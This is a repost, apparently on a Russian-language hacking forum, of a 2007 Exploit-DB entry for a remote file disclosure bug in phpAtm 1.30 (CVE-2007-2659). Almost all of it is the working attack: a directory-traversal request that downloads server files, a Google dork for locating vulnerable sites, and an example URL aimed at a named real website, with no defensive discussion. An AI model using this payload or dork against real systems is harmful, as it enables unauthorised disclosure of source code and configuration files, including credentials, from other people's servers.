Exploit phpAtm 1.30 - 'downloadfile' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3918
Проверка EDB
  1. Пройдено
Автор
ALI.MOHAJEM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-2659
Дата публикации
2007-05-13
Код:
******************************************************************************************
download page in : http://phpatm.free.fr/
 
bug in : phpatm
injection attack :
 index.php?action=downloadfile&filename=index.php&directory=../&
 
Dork in google : "powered by php advanced transfer manager"
 
example : http://www.furytech.net/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../
*******************************************************************************************
************************************************************************************
found bug by : Ali.Mohajem
Email : [email protected]
Website : wWw.Shayatin-team.com
www.mohajem.net
www.mohajem.org
special tnx : fireman - dr.trojan-L0rd-Samir-s4rem-and all iranian hackers
*************************************************************************************

# milw0rm.com [2007-05-13]
 
Источник
www.exploit-db.com

Похожие темы